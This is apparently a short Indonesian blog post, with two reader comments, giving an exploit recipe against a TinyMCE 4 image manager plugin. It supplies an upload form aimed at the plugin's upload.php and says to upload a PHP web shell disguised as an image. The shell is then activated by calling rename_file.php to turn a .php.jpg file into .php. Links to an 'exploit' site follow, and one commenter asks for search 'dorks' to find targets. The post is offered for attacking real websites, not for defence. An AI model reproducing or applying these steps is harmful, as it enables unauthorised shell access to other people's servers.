Tinymce 4 Image Manager
Author : Khuneable
Anti burp y 
CSRF
<form enctype="multipart/form-data" action="sitecom/tinymce/plugins/image/upload.php" method="post">
<input type="file" name="upl" multiple="multiple">
<input type="submit" value="Proccess!">
</form>
<form enctype="multipart/form-data" action="sitecom/tinymce/plugins/image/upload.php" method="post">
<input type="file" name="upl" multiple="multiple">
<input type="submit" value="Proccess!">
</form>
Upload shell bentuk gambar dlu ya
terus next dibawah
Setelah upload
sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php
CSRF Online :
https://www.exploit.sultra1news.com/csrf.php
https://www.exploit.sultra1news.com/csrf.php
Shell :
sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php
sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php
GABISA LEBIH RINCI LAGI TUTORNYAA? GAJELASS
ReplyDeletedork?
ReplyDelete